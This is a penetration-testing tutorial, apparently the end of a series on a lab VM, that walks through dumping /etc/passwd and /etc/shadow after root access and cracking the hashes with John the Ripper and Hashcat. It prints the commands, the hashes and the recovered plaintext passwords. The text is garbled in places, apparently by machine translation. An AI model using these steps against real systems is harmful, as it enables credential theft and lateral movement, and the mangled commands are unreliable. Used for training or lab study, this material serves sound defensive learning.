After accessing a root account, the next rules of procedure use this possibility to do something more important. If the user passwords on the system can be retrieved and cracked, an attacker can use them to turn on other computers if the logon is the same across systems. There are two proven password cracking tools that can accomplish this: John the Ripper and Hashcat
Passwd & Shadow File Overview
A few files of particular interest on Linux systems are the / etc / passwd and / etc / shadow files. The / etc / passwd file contains basic information about each user account on the system, including the root user with full administrator privileges, the system service accounts, and the actual user. There are seven fields in each line of / etc / passwd. A typical line looks like this:
msfadmin: x: 1000: 1000: msfadmin ,,,: / home / msfadmin: / bin / bash
The first field is the user's login name. The second field has traditionally contained an encrypted password, but nowadays (unless you are extremely lucky) it only contains the letter "x" to indicate that a password has been assigned. If this field is blank, the user does not have to enter a password to log in.
The third field is the user ID, a unique number assigned to the user, followed by the group ID in the fourth field. The fifth field is usually the full name of the user, although it may be left blank. The sixth field is the user's home directory, and finally the seventh field is the default shell, which is usually set to / bin / bash.
The / etc / shadow file contains the encrypted passwords of users on the system , While the / etc / passwd file is usually readable, / etc / shadow can only be read by the root account. The shadow file also contains additional information, such as: For example, expiration dates for the password. A typical line in / etc / shadow looks like this:
msfadmin: $ 1 $ xn10zj2c $ rt / zzCW3mLtUWA.ihZjA5 /: 14684: 0: 99999: 7 :::
Since we are accessing root level With our kernel exploit, we can use these files to uncover other users' passwords, hoping to move to other systems and expedite exploitation.
The first thing we need to do Copy the contents of / etc / passwd and / etc / shadow into their own text files on our local machine; let's call them passwd.txt and shadow.txt respectfully
cat / etc / passwd root: x: 0: 0: root: / root: / bin / bash Daemon: x: 1: 1: daemon: / usr / sbin: / bin / sh bin: x: 2: 2: bin: / bin: / bin / sh sys: x: 3: 3: sys: / dev: / bin / sh sync: x: 4: 65534: sync: / bin: / bin / sync games: x: 5: 60: games: / usr / games: / bin / sh man: x: 6: 12: man: / var / cache / man: / bin / sh lp: x: 7: 7: lp: / var / spool / lpd: / bin / sh Mail: x: 8: 8: Mail: / var / Mail: / bin / sh Messages: X: 9: 9: Messages: / var / spool / Messages: / bin / sh uucp: x: 10: 10: uucp: / var / spool / uucp: / bin / sh Proxy: x: 13: 13: Proxy: / bin: / bin / sh www data: x: 33: 33: www data: / var / www: / bin / sh Backup: x: 34: 34: Backup: / var / Backups: / bin / sh List: x: 38: 38: mailing list manager: / var / list: / bin / sh irc: x: 39: 39: ircd: / var / run / ircd: / bin / sh gnats: x: 41: 41: Gnat's bug reporting system (admin): / var / lib / gnats: / bin / sh nobody: x: 65534: 65534: nobody: / nonexistent: / bin / sh libuuid: x: 100: 101 :: / var / lib / libuuid: / bin / sh dhcp: x: 101: 102 :: / does not exist: / bin / false syslog: x: 102: 103 :: / home / syslog: / bin / false klog: x: 103: 104 :: / home / klog: / bin / false sshd: x: 104: 65534 :: / var / run / sshd: / usr / sbin / nologin msfadmin: x: 1000: 1000: msfadmin ,,,: / home / msfadmin: / bin / bash bind: x: 105: 113 :: / var / cache / bind: / bin / false postfix: x: 106: 115 :: / var / spool / postfix: / bin / false ftp: x: 107: 65534 :: / home / ftp: / bin / false postgres: x: 108: 117: PostgreSQL administrator ,,,: / var / lib / postgresql: / bin / bash mysql: x: 109: 118: mysql server ,,,: / var / lib / mysql: / bin / false tomcat55: x: 110: 65534 :: / usr / divide / tomcat5.5: / bin / false distccd: x: 111: 65534 :: /: / bin / false user: x: 1001: 1001: only one user, 111 ,,: / home / user: / bin / bash Service: x: 1002: 1002: ,,,: / home / service: / bin / bash telnetd: x: 112: 120 :: / not available: / bin / false proftpd: x: 113: 65534 :: / var / run / proftpd: / bin / false statd: x: 114: 65534 :: / var / lib / nfs: / bin / false
cat / etc / shadow Root: $ 1 $ / avpfBJ1 $ x0z8w5UF9Iv. / DR9E9Lid .: 14747: 0: 99999: 7 ::: Daemon: *: 14684: 0: 99999: 7 ::: am: *: 14684: 0: 99999: 7 ::: sys: $ 1 $ fUX6BPoT $ Miyc3UpOzQJqz4s5wFD9l0: 14742: 0: 99999: 7 ::: sync: *: 14684: 0: 99999: 7 ::: Games: *: 14684: 0: 99999: 7 ::: Man: *: 14684: 0: 99999: 7 ::: LP: *: 14684: 0: 99999: 7 ::: Mail: *: 14684: 0: 99999: 7 ::: Messages: *: 14684: 0: 99999: 7 ::: UUCP: *: 14684: 0: 99999: 7 ::: Proxy: *: 14684: 0: 99999: 7 ::: www data: *: 14684: 0: 99999: 7 ::: Backup: *: 14684: 0: 99999: 7 ::: List: *: 14684: 0: 99999: 7 ::: IRC: *: 14684: 0: 99999: 7 ::: Mosquitoes: *: 14684: 0: 99999: 7 ::: nobody: *: 14684: 0: 99999: 7 ::: libuuid:!: 14684: 0: 99999: 7 ::: dhcp: *: 14684: 0: 99999: 7 ::: syslog: *: 14684: 0: 99999: 7 ::: klog: $ 1 $ f2ZVMS4K $ R9XkI.CmLdHhdUE3X9jqP0: 14742: 0: 99999: 7 ::: sshd: *: 14684: 0: 99999: 7 ::: msfadmin: $ 1 $ XN10Zj2c $ Rt / zzCW3mLtUWA.ihZjA5 /: 14684: 0: 99999: 7 ::: bind: *: 14685: 0: 99999: 7 ::: Postfix: *: 14685: 0: 99999: 7 ::: ftp: *: 14685: 0: 99999: 7 ::: postgres: $ 1 $ Rw35ik.x $ MgQgZUuO5pAoUvfJhfcYe /: 14685: 0: 99999: 7 ::: mysql:!: 14685: 0: 99999: 7 ::: tomcat55: *: 14691: 0: 99999: 7 ::: distccd: *: 14698: 0: 99999: 7 ::: User: $ 1 $ HESu9xrH $ k.o3G93DGoXIiQKkPmUgZ0: 14699: 0: 99999: 7 ::: Service: $ 1 $ kR3ue7JZ $ 7GxELDupr5Ohp6cjZ3Bu //: 14715: 0: 99999: 7 ::: telnetd: *: 14715: 0: 99999: 7 ::: proftpd:!: 14727: 0: 99999: 7 ::: statd: *: 15474: 0: 99999: 7 :::
John the Ripper is a popular password-detection tool that supports many common hash types and a useful autodetect feature. It has been around for some time and continues to be one of the strongest and easiest to use available crackers.
Before we can inject the obtained hashes into John, we need to combine a utility called unshadow to put the passwd and shadow files into a format that John can read. Run the following command to merge the data into a new text file called passwords.txt:
unshadow passwd.txt shadow.txt> passwords.txt
John can work independently by just typing john plus any file you use for typing, but it's often much more useful to supply a word list. There are a few word lists available in the / usr / share / wordlists directory, but at the moment we are using sqlmap.txt since it's a pretty nice list. Use the flag – wordlist to specify the list to use and submit the input file:
john --wordlist = / usr / share / wordlists / sqlmap.txt passwords.txt Warning: Detected hash type "md5crypt", but the string is also recognized as "aix-smd5" Use the option "--format = aix-smd5" to force the loading of these types Using standard input encoding: UTF-8 7 password hashes loaded with 7 different salts (md5crypt, crypt (3) $ 1 $ [MD5 128/128 SSE2 4x3]) Remaining 1 password hash Press & # 39; q & # 39; or Ctrl-C to cancel almost any other button for the status 0g 0: 00: 00: 51 DONE (2018-08-06 14:10) 0g / s 27478p / s 27478c / s 27478C / s Zzzzzzz1..zzzzzzzzzzzzzzz Session Completed
We can see that John recognizes the type of hash used as md5crypt, also known as aix-smd5, and after some time it successfully completes the session. Now we can use the flag – show to display the cracked passwords that John has successfully recovered:
john --show passwords.txt sys: batman: 3: 3: sys: / dev: / bin / sh klog: 123456789: 103: 104 :: / home / klog: / bin / false mspfadmin: msfadmin: 1000: 1000: msfdmin ,,,: / home / msfadmin: / bin / bash postgres: postgres: 108: 117: PostgreSQL administrator ,,,: / var / lib / postgresql: / bin / bash user: user: 1001: 1001: only one user, 111 ,,: / home / user: / bin / bash Service: Service: 1002: 1002: ,,,: / home / service: / bin / bash 6 password hashes cracked, 1 left
After the user name in the first field we now see the clear text password in the second field. It tells us that six out of seven password hashes were cracked; Depending on the hardware used, the word list supplied and the length and complexity of the passwords, different levels of success are achieved.
Cracking Hashes with Hashcat
The next tool we'll look at is Hashcat. This is an extremely powerful hash cracking tool with a lot of features and both CPU-based and GPU-based versions. From Hashcat v3.00, the CPU and GPU tools have been merged, with the pure CPU version becoming Hashcat legacy.
Unlike John, the simplest way to use Hashcat is to self-provision the password washes. Copy all the hashes we want to crack into a new text file that we call hashes.txt :
cat hashes.txt $ 1 $ / avpfBJ1 $ x0z8w5UF9Iv. / DR9E9Lid. $ 1 $ fUX6BPoT $ Miyc3UpOzQJqz4s5wFD9l0 $ 1 $ f2ZVMS4K $ R9XkI.CmLdHhdUE3X9jqP0 $ 1 $ XN10Zj2c $ Rt / zzCW3mLtUWA.ihZjA5 / $ 1 $ Rw35ik.x $ MgQgZUuO5pAoUvfJhfcYe / $ 1 $ HESu9xrH $ k.o3G93DGoXIiQKkPmUgZ0 $ 1 $ kR3ue7JZ $ 7GxELDupr5Ohp6cjZ3Bu //
Hashcat contains many modes that can be executed depending on the type of hash you are using. We saw earlier that John identified our shadow hashes as md5crypt, so we can type hashcat –help to see all options for this tool and the various modes available. In the list we find that md5crypt mode is 500:
0500 | md5crypt, MD5 (Unix), Cisco IOS $ 1 $ (MD5) | operating systems 3200 | bcrypt $ 2 * $, Blowfish (Unix) | operating systems 7400 | sha256crypt $ 5 $, SHA256 (Unix) | operating systems 1800 | sha512crypt $ 6 $, SHA512 (unix) | operating systems 122 | MacOS v10.4, MacOS v10.5, MacOS v10.6 | operating systems 1722 | macOS v10.7 | operating systems 7100 | macOS v10.8 + (PBKDF2-SHA512) | Operating Systems
Run the following command to start cracking:
hashcat -m 500 -a 0 -o cracked.txt hashes.txt /usr/share/wordlists/sqlmap.txt -O Hashcat (v4.1.0) starts ... * Device # 2: No native Intel OpenCL runtime. Expect massive speed loss. You can use --force to override, but you can not report any related errors. OpenCL Platform # 1: Intel (R) Corporation ========================================= * Device # 1: Intel (R) Core (TM) i5 CPU M 480 @ 2.67GHz, 934/3736 MB assignable, 4MCU OpenCL Platform # 2: The Pocl Project =================================== * Device # 2: pthread-Intel® Core ™ i5 CPU M 480 @ 2.67GHz, skipped. Hashes: 7 outcrops; 7 unique outcrops, 7 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotated Rules: 1 Applicable optimizers: * Optimized kernel * Zero byte
Let's break this down.
- The flag -m indicates the mode we want to use.
- The -a flag determines the type of attack In this case 0 as a standard straight fashion.
- Then we specify the output file as cracked.txt with the -o flag in hashes.txt as our input file containing the hashes. We can also use a word list, as we did with John earlier.
- Finally, the -O flag allows optimized kernels (depending on the system used, it may or may not be required) I know that it limits the password length.
While running Hashcat we can check the progress at any time by simply entering s to display the status:
[s] tatus [p] use [b] ypass [c] heckpoint [q] uit => s Session ..........: hashcat Status ...........: is running Hash.Type ........: MD5crypt, MD5 (Unix), Cisco IOS $ 1 $ (MD5) Hash.Target ......: hashes.txt Time.Started .....: Mon 6. Aug. 14:18:10 2018 (30 Sec.) Time. Estimated ...: Mon Aug 6 14:21:08 2018 (2 minutes, 28 seconds) Guess.Base .......: file (/usr/share/wordlists/sqlmap.txt) Guess.Queue ......: 1/1 (100.00%) Geschwindigkeit.Dev. # 1 .....: 15816 H / s (7.84ms) @ Accel: 256 Loops: 125 Thr: 1 Vec: 4 Restored ........: 5/7 (71.43%) digests, 5/7 (71.43%) salts Progress .........: 1648627/9845703 (16.74%) Rejected .........: 3059/1648627 (0.19%) Restore.Point ....: 234929/1406529 (16.70%) Candidates # 1 ....: 9dH8eJEs -> 9notes HWMon.Dev. # 1 .....: N / A
Once the process is almost complete, a message is displayed, followed by some information such as speed, number of hashes recovered, and start and stop times.
Approaching the final key area - workload adjusted. Session ..........: hashcat Status ...........: Exhausted Hash.Type ........: MD5crypt, MD5 (Unix), Cisco IOS $ 1 $ (MD5) Hash.Target ......: hashes.txt Time.Started .....: Mon Aug 6th 14:18:10 2018 (2 minutes, 59 seconds) Time. Estimated ...: Mon Aug 6th 14:21:09 2018 (0 sec.) Guess.Base .......: file (/usr/share/wordlists/sqlmap.txt) Guess.Queue ......: 1/1 (100.00%) Speed.Dev. # 1 .....: 15738 H / s (8.15ms) @ Accel: 256 Loops: 125 Thr: 1 Vec: 4 Restored ........: 5/7 (71.43%) digests, 5/7 (71.43%) salts Progress .........: 9845703/9845703 (100,00%) Rejected .........: 30891/9845703 (0.31%) Restore.Point ....: 1406529/1406529 (100.00%) Candidate # 1 ....: zzbell0506 -> zzzzzzzzzzzzzzz HWMon.Dev. # 1 .....: N / A Start: Mon. 6th August 14:18:06 2018 Stopped: Mon Aug 6 14:21:10 2018
Now we can display the contents of cracked.txt and display the passwords in plain text:
cat cracked.txt $ 1 $ fUX6BPoT $ Miyc3UpOzQJqz4s5wFD9l0: Batman $ 1 $ Rw35ik.x $ MgQgZUuO5pAoUvfJhfcYe /: postgres $ 1 $ kR3ue7JZ $ 7GxELDupr5Ohp6cjZ3Bu //: Service $ 1 $ HESu9xrH $ k.o3G93DGoXIiQKkPmUgZ0: Users
Online Hash Cracking
The prevalence of cloud technologies and distributed computing brings a whole new perspective to password cracking. Most hackers run a virtual machine, a laptop, or at best a powerful desktop computer, but many online services use dedicated servers and resources to crack hashes. Websites like CrackStation, Online Hash Crack and MD5 / Sha1 Hash Cracker provide the convenience of password cracking directly from the browser. None of these seemed to support the md5crypt hashes we had, but it's easy to find support for many common hash formats like MD5, SHA1, and LM.
One quick note: If you can not find the right hash for online format, or if you just want to save some time, it's certainly safe to contact Google. Sometimes, if you're just looking for the exact hash you're trying to crack, you can get results. The probability is high if the password is a default or generic password, or if it is a hash that was previously cracked. You can find it in the search results. A quick Google search could save you a lot of time and effort.
In this series, we learned how to use Metasploit to compromise a web server and get a low-level shell. used a kernel exploit to perform a local rights escalation and get root-level access, cracking some password hashes with John the Ripper and Hashcat. Often a system can be operated with this exact same process, just with different exploits and attack vectors. Now that you have more tools and techniques, go out and train. Happy hacking!